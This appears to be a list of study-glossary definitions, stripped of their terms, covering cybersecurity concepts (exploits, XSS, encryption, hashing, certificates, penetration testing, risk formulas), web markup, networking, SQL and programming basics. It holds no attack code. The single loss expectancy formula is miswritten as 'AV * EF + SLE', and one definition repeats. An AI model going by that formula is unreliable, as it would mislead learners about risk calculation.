a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to cause unintended or unanticipated behavior to occur on computer software, hardware, etc.
A method attackers use to find open or vulnerable ports
Cross-site scripting (XSS) is a security bug that can affect websites. If present in your website, this bug can allow an attacker to add their own malicious JavaScript code onto the HTML pages displayed to your users. Once executed by the victim's browser, this code could then perform actions such as completely changing the behavior or appearance of the website, stealing private data, or performing actions on behalf of the user.
The same key is used to encrypt and decrypt (e.g., Caesar, Vigenere)
One key encrypts, a different key decrypts.
Public key encryption is a type of asymmetric key encryption. There’s one key that encrypts the information and there is a different key that decrypts the information.
Finds the remainder after division of one number by another (sometimes called modulus). Example: 14 ➗ 4 = 3 remainder 2 14 mod 4 = 2 14 % 4 = 2
A method in cryptography by which keys (public or private) are exchanged between two parties.
One of the first asymmetric key implementations and was responsible for securing the exchange of keys.
Occurs when someone secretly intercepts communications between two parties by impersonating one or both parties.
The first widely used asymmetric algorithm used for both signing and encryption.
The output from any input that has been processed through a hashing algorithm / function.
The word hashing literally means to scramble. Hashing changes a message into an unreadable string of text for the purpose of verifying the message’s contents, but not hiding the message itself. It must be easy to compute the output (the digest) for any input, but hard to compute the input for any output. A hash function takes an input string of arbitrary length and produces a fixed- size, short output called a digest . It’s always the same length no matter how big the input is AND the output is always the same hash for any given input. Unlike symmetric and asymmetric algorithms, there are no “keys” in hashing functions.
whenever 2 inputs map to the same output.
whenever you can work backwards through an algorithm (like a Caesar cipher)
A small data file that digitally binds a public cryptographic key to an organization.
Will secure one domain or subdomain.
Will secure one domain and an unlimited number of its subdomains.
Will secure multiple domains.
Belongs to the Certificate Authority.
Acts as a “middle-man” between the root certificate and the server certificate.
Issued to the domain.
Allows a server to validate their own SSL certificate by bundling a time-stamped response signed by the certificate authority.
The process of associating a host with their expected certificate or public key.
The process of identifying, assessing and prioritizing potential risks for an organization or company.
Designed and used to assess computers, networks or applications for known weaknesses.
The practice of gathering, collecting, and logging some or all packets that pass through a computer network.
A situation when a device or system has two or more operations running at the same time that must be completed in proper sequence.
A situation when too much data is placed into a fixed-sized buffer that can cause data corruption.
When a value higher than the maximum or lower than the minimum is used which can result in logic errors.
When a company hires a white hat hacker to assess the security of a system by finding and exploiting vulnerabilities.
Collecting information about a target without directly accessing the system (social media, news, website, etc).
Collecting information about a target by actively engaging a system and analyzing responses (network and port scans).
When the tester is first able to gain access into the target system.
Using a compromised trusted system to gain access to a target system within the same network.
Using tools to gain higher levels of privilege.
When the tester has no knowledge of the target system (simulates an external attack).
When the tester has intimate knowledge of the target system (simulates an internal attack).
When the tester is limited knowledge of the target system.
Risk assessment that gives a numerical (typically monetary) value to the impact of a threat occuring.
How much money could be lost at any one time which is determined by the formula: AV * EF + SLE
How much an asset is worth.
The amount of the asset that would be impacted (amount of time, % of data, etc) by a threat event.
How much can be expected to be lost in a year due to a single threat event which is determined by the formula: SLE * ARO = ALE
How often a threat event per year (typically determined by historical data).
Risk assessment that defines an event’s level of risk in words rather than numbers which is determined by the potential level of impact and the likelihood of occurrence.
Risk response that removes the risk by avoiding the behavior completely.
Risk response that shares the responsibility of the risk with someone else.
Risk response that accepts the risk as is.
Risk response that takes steps to avoid the risk or minimize the impact or likelihood.
A model designed to demonstrate the most basic functionality or basic design of a product, sometimes used as a proof of concept
A particular sequence of actions that a user takes to accomplish a particular task
A can-do attitude in which a person views challenges and setbacks as ways to learn rather than terminal obstacles in their path to their goal
Indentation is the visual structure of how your code is laid out. It uses tabs to organize code into a hierarchy.
a set of data that describes and gives information about other data.
The connection between one HTML page to another HTML page
Allows adding an image to a web page. It is self-closing. The attributes of an `<img>` tag include `src`, which specifies where to get the image from (the url for an image ), and `width` and `height` attributes, which specify the size of the image in pixels.
Way to organize information with a simple structure that is easy to read and write on a webpage. There are ordered and unordered HTML lists.
Defines an unordered list in HTML.
defines a list item inside an HMTL list.
Tables display information in a grid.
Allows adding several different types of styles to HTML elements.
Cascading Style Sheets. The language for designing web pages and adding style.
Defines which HTML elements a CSS rule applies to.
`class` is an attribute we can add to HTML tags in order to style a specific group of elements.
`id` is an attribute we can add to an HTML tag to style that specific element.
Stands for Uniform Resource Locator. You are locating a resource that exists somewhere on the internet.
Distributed Denial of Service attack. Spam a web server with so many requests so close together that it crashes. Sometimes spitting out valuable information as it crashes.
A flaw or weakness in a system or device.
A cyber threat is the potential harm that could be caused by someone taking advantage of a vulnerability.
secure data transfer protocol when on the internet
Remote Authentication Dial-In User Service (RADIUS) is a client / server protocol and software that enables remote access servers to communicate with a central server to authenticate users and authorize their access to the requested system or service.
A network security device that monitors and filters incoming and outgoing network traffic.
(MFA) An extra layer of authentication that requires two or more factors for authentication. Typically, these factors fall into three categories: something you know (password), something you have (such as a phone), or something you are (such as your fingerprint).
Creates a private network connection over a public network
Cryptographic protocols for secure communication
A suite of protocols used to secure internet protocol communications
A secure method for remote login from one computer to another
A protocol for verifying user identities across multiple systems
Wireless security protocols for protecting Wi-Fi connections
A type of internet connection that uses a phone line to connect to the web
Digital Subscriber Line, a faster phone-based connection than dial-up
A high-speed internet connection that uses light to transmit data through thin glass or plastic fibers
Fifth-generation wireless network technology offering high-speed internet access on mobile devices
The maximum rate of data transfer across a network connection
The delay before a transfer of data begins following an instruction
A centralized system that manages users, devices, and permissions across a network.
Translates human-readable domain names into IP addresses.
Automatically assigns IP addresses to devices on a network.
Allows users on the network to access and modify shared documents or resources.
Software that manages computer hardware and software resources and provides services for computer programs.
Malicious software designed to damage, disrupt, or gain unauthorized access to systems.
A SQL condition that filters results from a `SELECT` query
Symbols used in conditions (`=`, `!=`, `>`, `<`, `>=`, `<=`)
A logical expression that restricts what data is returned
To narrow down a set of results based on rules
A logical operator that requires multiple conditions to be true
A SQL operator used to filter results within a range (inclusive)
A SQL operator used for pattern matching in text data
A SQL operator that checks if a value matches any value in a given list
A condition that uses multiple filters together
A SQL clause that sorts the returned query results by one or more columns
Ascending order; the default sort direction
Descending order; used to reverse the default sorting
A SQL operation that combines rows from two or more tables based on a related column.
A join where each row in one table is paired with every row in another.
A field in one table that refers to the primary key in another table.
A temporary name assigned to a column or table using the `AS` keyword in SQL
A SQL keyword used to rename fields or tables in the query result
An organized collection of data stored electronically and accessed using a database management system (DBMS)
Structured Query Language, used to retrieve and manipulate data in a database
Information that can be used to identify, contact, or locate a single person
A request for data or information from a database
A collection of related data entries organized in rows and columns
A single record in a table
A category of data stored in a table
SQL command used to add new records to a table
SQL command used to retrieve data from a table
A float, or floating point value, is a numeric value that can have decimal level precision (ex: 3.14)
The way humans communicate with each other, like English, Spanish, or Mandarin.
A set of instructions (commands) and rules used to communicate with computers. Examples include Python, JavaScript, and HTML.
A way to classify the kind of information you can use in programming, like numbers, words, or true/false values.
Translates and executes program code line by line into machine code.
Translates, or “compiles” the entire code into machine code and then runs the program, or sets aside to run later.
A programming language is any set of rules that converts strings, or graphical program elements in the case of visual programming languages, to various kinds of machine code output.
a computer programming language consisting of binary instructions
A language where variable types are determined at runtime, not in advance.
The process of verifying and enforcing the constraints of types in a programming language.
The period when a program is running, after it has been compiled or interpreted.
A language where variable types are explicitly declared and checked at compile time.
A language where variable types are explicitly declared and checked at compile time.
Processes commands to a computer program in the form of lines of text.
